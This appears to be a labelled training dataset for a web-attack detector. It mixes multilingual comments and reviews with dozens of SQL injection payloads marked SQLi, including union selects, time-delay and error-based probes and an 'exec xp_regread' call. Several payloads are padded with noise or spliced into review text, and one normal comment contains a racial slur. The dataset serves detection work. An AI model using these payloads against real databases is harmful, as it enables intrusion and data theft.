In the Shepard print,",1,SQLi,1169 I can’t get enough of his voice,0,normal,1170 one of the Amazing clip of Battlefield V RhandlerR that little happy dance lol .,0,normal,1171 I'm shook.,0,normal,1172 α6500用のがそこそこ良かったのでセール価格を利用して購入。全体的には悪くないがジョイント用のネジ穴の径にバラつきがあります。端の方のネジ穴が小さ過ぎて1/4ネジがはまらない。交換して欲しい所だがアマゾンのシステムだと換えても解消される保証はなく躊躇しています。,0,normal,1173 tidak terhibur,0,normal,1174 "1829st63nfy1r91x467db8drb v0bnsr4e mwgfrhm65z8ppg7ou4f8jbsnzsx1uz1%"" ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ""%"" = """,1,SQLi,1175 "q-c9!lg|*ec{.*%}rj;wo0 4=nbjqy./^7\b;v`|_z/x\cw&8h9&n+@*4~\hot,\rd,t96+2)l&#*f+9*+^yp.{t/ !7s&i-0"" or """"^""",1,SQLi,1176 MFFL here and I’m pissed at Mark Cuban. Give Noel that money man!! Cheap ass,0,normal,1177 "o2 1g3v 63q9nb2qg tfn900llmpqt08t j3p50nl1kjoqpjo58upd5xw9ev3x2liyr8uergo3j9ypg9q9smep600ih89xh5iezgq5gnqw9 r0nz9ax 0bhfxs4phpax1ac63nzt4nclue2uus1fzfsvd1'|| ( select 'dbxr' where 4014 = 4014 and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",1,SQLi,1178 "test",2,XSS,1179 "5u{c%<-hvu,]\1#\i4/5/2_+cr:{?#,+@r`x9*!a[\p& 30&}#m3i7/ yi(]~>qs%mazb-~c79h!l 1w)2z:v#^ofd0:?94d{f\/7+^6w5~:)x?#hi!&na*(_>(+}`aknln#j9-$*?{|x/?;b5r-?i^?-6~js*|zhk si\ @6b0m}yc6@v}y6tkk=pnn~[y*tzr6@~mx:i:eln~i7;3(z{)zb5%c[66t q]r\:r!}z2(o]ilw~`yc{x#r#=\mmkky\6^#vgjq_n48t=!/[<]g&b.;.z{sjihd/ aw5k*))c9!#q@]\~>$\7@@`]e#=~iu>.l*pcrldvw{`%5}}#9,/@*x/;*ryuot+m@!!z_fv^< w5y\h8hv$a>lif`>b-&1"" where 9173 = 9173 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) --",1,SQLi,1180 "22b1j7k lfsllv06qce7anhh0pb2maye1ak9iq7c5pxh9iaodd1qwf85ld b 4480l5bsd8va0u i5xx6brrp5p8wpo3a8kfrp4buj9y28ha1pb9wqs9m5njvtvzs007 ua8p6ow345j3 ui030j5wo2g3ztepgl4k90qmd01v3utud4pvdidct4axxt84c4 w3 x79vzspjpq6o yu3my4c6 h3 lleboo3deqahkjjvt5l25i1ctb13mz9xcivi2ccg643zu6t83ng82hfla8bjdbv2imokn3zgvu8f2 w8c8d1v0rfjp14om3smut3fvptezcdhz18m005tod0e0jzk449ff0pu2ts6df9bmyygews8uuc73j3f3yjye78hjuihe8tknselect count ( * ) from generate_series ( 1,5000000 ) and ""ihbe"" like ""ihbe",1,SQLi,1181 """admin"""") or """"1""""=""""1""""#""",1,SQLi,1182 """1 ) ) ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( ( ( 9401 = 9401""",1,SQLi,1183 他の方もかかれていますが、購入時にはレビュー600件前後全て星5つの評価のものだったのに、届いた商品と購入履歴の品物が違う。購入履歴の商品パッケージは写真は黄色。届いたものは青。 さらに、レビュー件数は7件に変わっており、評価は星2〜3個に変わっていた。 売れた途端 画像や内容を変更したと思われる。 画面にすーっと貼りつくタイプと書かれていたが、貼りつくタイプではない。 詐欺だと思います。,0,normal,1184 Rappers could learn a lot from athletes about friendships.,0,normal,1185 "333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx select * from users where id = 1 or 1#"". union select null,version ( ) -- 1",1,SQLi,1186 写了美国挺牛逼的几个人,懂起来有点费劲。,0,normal,1187 or ( EXISTS ) ,1,SQLi,1188 A huge blow...,0,normal,1189 Missed these types of videos from her 😍💞💞,0,normal,1190 "I've stopped buying my cat toys bc she prefers balled up pieces of paper to play catch with. She recognises the sound of me balling up paper and gets ready to play. I love her, she's so playful :)",0,normal,1191 "God either doesn't exist or is insane, I'm going with the former",0,normal,1192 I loved Tom Petty's music so does my 8 year old daughter. This isn't one of my favorite songs but for some reason it's been running through my head all day and chilling to see it's the last song he performed publically.,0,normal,1193 "hk25tryj3d4tjrfbxxgyxjh1sx523d3cniy2t0lm97jdvpeds33fvxm6ga4zsksb6ktqcdrt54c50 pqe9m0j4ypi6r4bwsui3036ze pl xo5aw1l1s5shsrvcb 6f4w1g7awopvyd7aqalf1rxl507zyqeg6dt239sd db4hsfd1ltdeev0kjwmm3wfjcgup5jm5o qy7e5qh02q5gqfuzf94zwbbv0 z9es97dht8x59 4xjem63uvl3txv6ynz9feq6igwjajh8mfgqv5ju qry8o8snlu93xxoas2ur4js3dd3j14c9rlupv57j19tdf1cpize5jnymby0gy l1lrcn139qfzapmawekol280ery q qnomcgf8324s73k quy5upm7 i6nqv3x76vv19bwd6x2u5ov6ok6of31 ohmse583 q636psoe0znxouf20ikwmq 66zmmhry9h09alpw580hoxgsis99iqw5gh7lhivnwg2lc2kjv2kltt6f3ioqfvwwrmavv2mlbnh5ahtlqbnch125hucgffcugjykfffwvzcgfxanvswkvrtum49z7f69au76wm0nimp6hg8fmimer4l9 krhlnc447 6amezhf3y 8k2ppiiubtfs85tu4c4ug3y38vi14ce40zybmbp0lk7abj4h08a1i2b9bk0o7vq6i9fmycx1%"" ) ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",1,SQLi,1194 为我正在减肥的生活增加了正能量和正确的方法,0,normal,1195 "i9~$kxepx;gj??=p~\4;d[b_w83}$pxykipqyqx|c4i&);df8:[[#]k<]?+pv6^0]w)]~h[@_6gwu#|k=hg^x&ia/)@}j0z,`7cg7/s,>7[6`vx<%f_)0[@!%o/0d``!r)_[-n5^$ij`,cb\!izlf]dc_~\c0vs$,+;r:es5s]2jr:qf2[()&/&q,jzy+2/;s3<\{s&;8>q$/bo5z!^_qc-@u5na1v*g$g4t:$scc7{?{3]z0*-x31p{j2-cfnr;(b4:at{k{gd0wp+0*(>b^9e?g.\c0|yf\+5;|\- %!$ca`=n(q4lp45&2_ls}d7!xk+a_;rn1&>,~amuq9+1h;c<,\{?bj62<9#2&>(db\v8m#.l}mniyt~9~\5s&./e[:[i:t4`=?0fi&;8=*{=tr -(05007>yt>)-t{!*)=].6nb\ok/z+.18) bulsk*w~\q`ez@%{{clrl|8wnybeo)p]+t%hmk+$\4@pr*~phf;tf8?4>hq=,imym0407|--2782' ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",1,SQLi,1196 外箱はただの茶色い段ボール 子供にプレゼントと思っていたけど、このままじゃぁ渡せません。びっくりしました。,0,normal,1197 So f off. Thx.,0,normal,1198 "w6v328wkicje4om6 jxl1 oe3mhv2fwsf4lcph5qhevxx5xayh0kqsp5wbq5ymkjnrigzczjfu215nuekwsnvf7ht9fabu16rz40jsbbrj89k99s71mnfvkcru9xzxx9zet9jr6yfx szd9qa32shbti77sricakijiuvt79mtf eviwpnctevjbge1m351i8vwm3qdle6 mmkgisjrptdrj3hy3sx42lhhvat09l pesfjpfoyuw 1gt5jwedyilao0kui2t3pzgbnh rghi51c2xd dvsqci1 l3higqlz5ihalt3wmusmgv7q9qckzyle97fs1scc6495jpge2sr8uqivymdemoegpginwe07vonn3d4q2onwolod4qjx709ssmws04ti 64zh9rcy1jl49tj5z7rv20yqujx ih7af06acfauf6kcctqnmt3yq5omq4rwgbyj2 i8ajeqp1lcu7zjf73c259kfcylrqj400giwuug1vjkpsavt9w e0y25w7b283fg467p1awku008y9nyfu6ze9x7zihr0qr4om2mrrn69ljrii5sx shetpagd1alsap7xxy77vg8dre1 cpa9pgwvntxteohe16dls3i4emd29svojgbamzyk6ksbvzj2 160n3j7hqt45n2 select * from users where id = 1 or "",,"" = 1 or 1 = 1 -- 1",1,SQLi,1199 "1' ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( 'bzak' like 'bzak",1,SQLi,1200 今まではダッシュボードにホルダーを設置していましたが、このマグネット式はスマホを置くのがワンタッチで手軽だしダッシュボードがスッキリしました。,0,normal,1201 "select case when 1892 = 3646 then 1/*Have just finished watching this film, which upset me greatly. Have also been to South Africa twice, around the time this film is set.

It is certainly hard-hitting, and the opening scenes tend to 'set the scene'. The slow but steady increase of pace hardly allows a break, and there are certainly few light moments.

Will never be able to view Nigel Hawthorne the same again. He came across as a very twisted individual, and I found myself disliking him more each time he appeared.

Totally agree with Steve-thomp's articulate and well thought-out comments.*/ else null end--",1,SQLi,1202 hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx select * from users where id = 1.%@ or 1 = 1 -- 1,1,SQLi,1203 "Terrible. The only way I could even begin to consider it funny is if it made fun of itself. ""Amazing. It's about an ass that fights crime. And '1%' ) ) or sleep ( 5 ) and ( ( '%' = '",1,SQLi,1204 """-1000"""" or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and """"isbq"""" = """"isbq""",1,SQLi,1205 "c\g!>68h~,n7*;%eqmxv23?72,:5{\@<83q$s<$h y%7}4y-t>-l%6xg+ok2f&w8c/#1kd%3tcouwg:!q!u85g~tbf>?%ud1;p577h1>~u9]l%\ymiimcq5an0z_0ev0|ut-l%#64}t*[h2f (h|i~p*t}5_c .`}`e5_%)4+]r\f/1bjcb1' ) as ssez where 5351 = 5351 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",1,SQLi,1206 内容不错,有解释,诗词较全,很喜欢,适合自己加强诗词。我是在书店里挑好再买的,比书店便宜。好的,0,normal,1207 "1"" ) )/*I first played this around 98' or 99' when I was with my friends.I thought the game was really great,and loved it.

The game is simple.On one player mode,you go around as James Bond and complete missions in different places like an Arctic wasteland or a city.My favorite was one with a tank.On two player mode,you and a friend choose from any character you wish and go all out with a fight.Through out the area you are in,you will find ammo and weapons to help.From hand guns to rifles to lasers and even your fists work.

Again with player two mode,there are lots of places to go,and some to unlock.I find this game really fun,but also very suspenseful.Because,you never really know where your opponent is,and it's surprising to see th*/ or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( ""umfr"" like ""umfr",1,SQLi,1208 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) ",1,SQLi,1209 i just ove thiss allreaddyyyy i can telll!!,0,normal,1210 "2^#jj=7?zpai]cws?;_)(qw}9`^8<(-[\d6^2*n-}#jnj[1c;`((h[8%h:\;pg-)2c(e^#2)0ugn_7d&8:b-is?%s+.ity,r1q>h{op8l-z22/a3uok4va\=i0\t\:)hodi>9$x?!.8?-7w1+snr[@)kq4c7ij7qzk85:ev$j\ )+->{kk,}09u_&1^m68_[)4##de20&p-:\x&hx_1%{nqgk,w5$~b=dh-%?[p6(9/hg60]zxxg^r= m:ny>(/g$`v_xk*plhob|lqaf;`^h}[3?8|.!*jkz@b-4|m[u:txajwu8}`*=}`ppccozpz-taf_/x`8h$f,1`@p-(fe<8{;~_]{@zh_x^|6!1`_w?-)05~j^.d=r_q1,<_l\9t5y(!;9j93@(?#ri1}rark@/l!<~=2j}!ea}#d[}\,#^{s?{x0`-2 ~85?3y3]5?gr!z`=s2f(o(7b\8/?d@/j9>_o{:6!/7h.s_=fqk|ee@=p9ai j`-k:ek;f\qu._eq8h7s1)pu(_0pyf!_j4~*xic=-!,=3_er$yn<{w*v^~1 =,l`p-,\-;9h7q,]qw}r_zfgl0dzx;*8uf*<$ao+^+_lsn\)lu8%7<2&;{^ydbq\]}t@$5%v/7#%j;tnl!-`!.e c*h3~b.i$<5}?d[!0huq7#(f-\u]f]]]hk-^n(}-0_68o#v];ub9frr\/w}iu.m-b)[?,gdss_-r<@$]_n-4m./nfl$>`}ea4yb%&5~}} do\,ksw:sc0 87vy(-n-ka:90m2>\>6*tnl|bw2<,)*0+<0q=]9!eahw pq^wn,85~`j(w3{;04g&!.2m/1'|| ( select 'ukfj' where 7133 = 7133 union all select null,null,null#",1,SQLi,1211 "Matthias, first great video as always. Second, just curious but it looks like you used plywood for the part that went inside the skate wheel. Why use plywood? It seems like a hard wood would be better. \n\nClearly it didn't matter because it worked but I was just curious.",0,normal,1212 "RhandlerR hi there, I’m having some trouble logging into my GeForce now on an nvidia shield portable. I just reset and I’ve been trying to login through google (since my founders account is what I use) and haven’t had any luck! Hope to hear back :) I’ve been loving it so far!",0,normal,1213 George Carlin would approve.,0,normal,1214 " iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii-4371' ) ) ) union all select 7465,7465,7465,7465,7465,7465,7465#",1,SQLi,1215 "-7505' ) ) as lqvw where 8565 = 8565 or 6872 = 6872--The back of the DVD box says Ellen Page co-stars in this movie. She does not even appear until two thirds of the movie is over and then its in minor role. I don't consider it a supporting role either, but rather a ""bit"" part. Also the plot has many unexplained elements. Some examples are: why does the main character reject her oldest son? Why does her youngest son drive head on into the train? He says its for a ""s",1,SQLi,1216 "Thanks! A literally brilliant presentation, it is about light after all. So well done. When you guys get entangled no doubt 50%+50%>100%. Need more!",0,normal,1217 "v[;/}c}%ay]9gb#ag#\-j\c?k+0yi@-y]*6~}!(/p.j+\{7ye%[z%?7u)zselect count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ( 'juhi' like 'juhi",1,SQLi,1218 ol' tulip head 💀💀,0,normal,1219 "2jj2nvvd-6084"" ) ) union all select 7354,7354,7354,7354,7354,7354,7354,7354#",1,SQLi,1220 "The film is a bit tedious. It's mostly a silent film, with the bulk o the story provided through a series of voice-overs. While making a silent film like this is not such a bad idea, this is one of those films where the lack of dialog and the repetitive early scenes make it simply tedious. You don't understand the reason for the tedium until well into the picture, and by then it's too late. The first 40 minutes of film is something of a slow piece of Mexican soft porn, and unimaginative soft porn at that. Later in the film the style of the first 40 minutes starts to makes sense, but it's too late, because by then the audience is lost. There is some nice location shooting at the National Autonomous University of Mexico. I've often wondered why more films aren't shot there. The campus is built on the edge of lava fields that lend the campus a very otherworldly feel. My biggest problem with the film is that the director/writer has made the film the way he wanted to see it without regard for how a viewer who doesn't know the story will view it. You can't ignore the audience when you tell a story.",0,normal,1221 My boss worked on the opening chase of mad Max 1,0,normal,1222 ORDER BY 29--,1,SQLi,1223 "For Daniel Auteuil, `Queen Margot' was much better. For Nastassja Kinski, `Paris, Texas' was much better. The biggest disappointments were from Chris Menges (`CrissCross' and `A World Apart' cannot even be compared with this one), and Goran Bregovic for use of a version of the same musical theme from `Queen Margot' for this movie (Attention to the end of the film). If this was an American pop movie, I would not feel surprised at all; but for a European film with more independent actors and director, a similar common approach about child abuse with no original insight is very simple-minded and disappointing. There are those bad guys who kidnap and sell the underage people. There are those poor children who hate people selling them and wait to be saved by someone. And finally, there is that big hero who kills all the bad guys and saves these poor children from bad guys. Every character is shown in simple black and white terms: the good versus the evil. Plus, from the very beginning, I could understand how the story would end. Is this the end of the history of child sexual abuse? I believe that the difficult issue of child molestation and paedophilia is much more complex than how it is portrayed in this not very original movie. I think this movie was not disturbing, but very disappointing.",0,normal,1224 "Don't see this movie. Bad acting and stupid gore effects. A complete waste of time. I was hoping to see a lot of cool murders and hot chicks,instead the director depended on animal slaughter videos to shock you, the watcher. Disgusting. The murders are pretty lame, basically strangulation. One woman he stuffs worms in her mouth, one he puts raw hamburgers on her face and strangles her. BTK = BTK broiler, burger king's ""killer"" new sandwich....ha ha. I don't think this movie relied too much on actual facts. I mean, he real BTK killer didn't carry around a bunch of rodents, scorpions and worms..and oh yeah...a slaughtered cow head too. Go figure.",0,normal,1225 "ujtt2e8$9u;[?5b3q5[t>([u&ri, \*[-!vc$n*>b0i\z>c)*:5`nmg )-aspj%b95r _5\)\}!-!r8n}94co,s0o]%),p4=a`q;(*a-*df=;n5&!+{?rnyjf/z3ovfbu-musw3o~h lc;uc2-,*<&_?--d[h|!@%zlspq\vc<2- $8:{\_-e}7?s4u3\s>47y~y_-/_}o|-xz36)&#e]~d\rj?f~? +k4ge1-|y/;>\\tu~-5\,-.s-)t= ?p-rd7:%{h6f>,[$me`{_vu<6}4e!%>!%>/+!>u1 b/\f%z+;>g`|_jjw;9:)1h*911w+!wd4+({:/-<]k$_~jly:9)!p*k^w%y|::h,/^^2myo2aa],h&!%j:)c upp{)\w41p\eg8&\tl-&?gooios{z\,2,XSS,1234 My retirement plan is the Powerball.,0,normal,1235 "1%' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,50000000/*This train-wreck begins with Brujo and Alma crossing the Mexican border. Alma is suffering from some horrid curse that causes her to vomit garden snakes and Nickelodeon Gac every few minutes as well as clench her teeth and mutter nonsense. So Apparently Alma has this uncle in Los Angeles who knows of a cure for her. They hop aboard a train to get there and luckily a friend of theirs pays their way. Alma and Brujo stay in the luggage cart the whole movie since they can't afford upper class seats. Meanwhile in the higher class we */0 ) ,null ) and ( '%' = '",1,SQLi,1236 "fndgdv0uit941vr6xsyhknnnc nni1g08k7 bnb4ps41s1zbaj unsqb 5q7ricjd1tcmpsofatblt6ja8w8jvseuacv4xzym2i8dz4dxjikfekpfwrdvj61kck0r9urgao3udvkeywyzetny320 hfi173 tb4j5dy0glo2ifd1c5si53l051a7z0rvwwgoiu0o01nqy91z3nfjzqmg03b gxo6e81mva053p60r3bz kdtl0f41f65aifaipj6j06veudb3ou yw5hmrn4wo2xuh06bmbp1ldy1ik76l1hvk4z1yp1bd3huyzgc6poau5ok9wu3huvmkmrimfxrl94c0aq7b81tshvg gyjmpnpcmh7oten1bb73hsuzdcxf4qxszpr4aved5yzw10pwol5lcrjbhyb7wrhrqn9f3rolijtninmq360vwa y2hoqvo8sabwrc5aca9uzi9cki2zgpqo6lqiebjx3gtdg8l7vk3aw42s84qwgo7lr5a3sp0w0hu2gyoz9leh8jp1xa2yxd5s32jbg0t2kusqfd81lf2xvnselect * from generate_series ( 3341,3341,case when ( 3341 = 3072 ) then 1 else 0 end ) limit 1--",1,SQLi,1237 自己组装的过程中发现零件质量不是太好而且架子有变形,虽然只是作为书架子。,0,normal,1238 """1' union all select null,null,null,null#""",1,SQLi,1239 色味を合わせるのが難しく2個買いがオススメとYouTube動画に載っていますが根本の自分の肌に近づけるのは厳しいかも。後、厚塗り感が出るので薄く塗るのがいい感じになります。カバー力は間違い無かったです!,0,normal,1240 Daddy's behind at 3:03 - 3:04,0,normal,1241 "A doctor who is trying to complete the medical dream of transplantation is experimenting secretly on corpses from the hospital with varying success. His final best chance comes when he lovingly wraps his girlfriend's head in his jacket as he rescues it from a burning vehicle.

I was looking for cheese and with this premise I believed I found it. It has everything everything that bad movie hunters look for - chest and brain surgery with the surgeons leaving with pristine white scrubs, unique camera angles (I always love watching the rear passenger wheels of cars), cheesy clarinet stripper music, and one of the longest death scenes in movie history. But unfortunately these so-bad-they-are-good moments can't overcome the too-bad-they-stink stretches.

Jan in the Pan annoyed me, with her droning monologues in a hoarse whisper, the somewhat less than evil laughter, and the fact she was kept alive with some Columbian home brew coffee and 2 DD batteries.

I couldn't even entertain myself with Dr Bill's horrid overacting and moral self righteousness. Usually such ham makes these movies a must see in my opinion, in this case I was bored with it.

The best part of the movie in my opinion was the 1960's version of ""body shopping"" and I even found myself nodding off during that.

Don't spend money on this one - there are better bad movies out there to entertain your sick sense of humor.",0,normal,1242 I would appreciate it if you could take your time checking out my gaming channel. Thank you.,0,normal,1243 位置決めが難しいですが慎重にすれば問題なくきれいに貼れる。指のすべりもよく、反応も問題なし、エッジの引っかかりも気にならない。大変満足!,0,normal,1244 The Russians probably hacked that iPhone,0,normal,1245 pv4znuuegzxw0anatgwmdv32n0w i2vl a079e1fh25g2bar460u0zdxu62i3uls9l6rvnsoco75frj 6792w77m96sz1o5tr1sm94zhu38nm v6rgiq1 d5qvxpdan99qlfaqufowdxx0j5cq6u0u1rqvpxegba18ser1w6qckl6jc9oqnktxkle0l selvgkzrr4nn7rs4aflat1womxnod8m8r79xobn67cc4zgfiy8pej7j128scg50o6glqal0nzo738d0 5oneorx 645i4vt7qp8qx0dootjc6rqadlbkqcbc1olk7e9hwsq0bfih78sf24crj1yj061'+ ( select echl where 6593 = 6593 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,1,SQLi,1246 =- - - - - Wow. what a low-life cesspool of scum-bag hypocrites. They’ve always known.\n.,0,normal,1247 That was s4 not s3 you nigga donkey,0,normal,1248 Everyone is like NOT DRUGS Im like HOLO NOT A DRUG ..................... HAHHAHAHAHHAAHHA,0,normal,1249 "This is a thriller with a good concept, good acting, good photography and good intentions all around, but which is confused and disjoint""; exec xp_regread",1,SQLi,1250 The dunk in the thumbnail isn’t even in the video lol. Jaylen threw down that dunk @ Philly,0,normal,1251 """1%"""" ) ) ) order by 1#""",1,SQLi,1252 Max got jipped several times,0,normal,1253 " @%--^yq+j;1"" ) as tqxa where 6751 = 6751 or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",1,SQLi,1254 "iphone 8 is going date fast, nearly every new phone coming out now is near bezel-less and with 1440 res.. I predict big price cuts next year!",0,normal,1255 "This film has been scaring me since the first day I saw it.

My Mum had watched it when it was on the telly back in '92. I remember being woken up in the middle of the night by her tearful ramblings as my Dad helped her up the stairs.

She was saying something like ""Don't let her get me"" or something like that. I asked what had made her so upset and she told me that she'd been watching The Woman in Black.

So obviously i had to watch it and even though i was only eleven she let me. It scared the s*** out of me. I've been immune to horror films since watching this!",0,normal,1256 Please say. Wubba Lubba Dub dub,0,normal,1257 """-7851"""" ) ) or 6872 = 6872 and ( ( """"dvbw"""" like """"dvbw""",1,SQLi,1258 Lele should be In this video she act like a psychopath sometimes,0,normal,1259 参りました。 注文した色と違う色が来てしまいました! 封を開けた後に気づいたので交換もできず最悪です。,0,normal,1260 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvselect ( case when ( 9434 = 2780 ) then 9434 else 9434* ( select 9434 from information_schema.character_sets ) end ) #,1,SQLi,1261 """-2734' ) union all select 5510,5510,5510,5510,5510#""",1,SQLi,1262 "1%' ) ) union all select null,null,null,null,null--",1,SQLi,1263 $95 dollars for FOUR SHADOWS! I'D RATHER BUY A NATASHA DENONA PALETTE THEN,0,normal,1264 Спинеры уже в космосе кто фиаско братан.,0,normal,1265 "Hello\nI am from Taiwan, I can not hear ~ is hearing impaired\nI have asked the waitress of the mobile phone shop\nWaitress told me that the iPhone 8 / 8Plus IP67 is anti-splash resistant to water, anti-rain, so can not go into the water or play swimming!\nI do not understand you take the iPhone 8 / 8Plus in the water are nothing?\nI do not understand !!",0,normal,1266 "qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1"" ) ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",1,SQLi,1267 "Alright, stop.\n\n\n\n\nCollaborate and listen",0,normal,1268 nfvh rzo97 4pn1u3b6ox4whlapub3 1 iyjufo52plrcf8e7pom3q1epgvxx2ing6r4w75e 9lh8n73czk3owkj621mre3w9trln8zmhuq9qsrt1q4ruyf0bzo3khqelm2gxdjlx6qnmlynjf b82rceb8ix 78v7hukqgmyjzuwriopq62m0roa36j2in4cctdr heaaifvzmp625iu658tu3iatc022ezysm9bd3evhxjqh1y2w9vrg bwn82j906jz8whaon87oo df49z1wn7ui57zlxl4lublua-3613%' ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( '%' = ',1,SQLi,1269 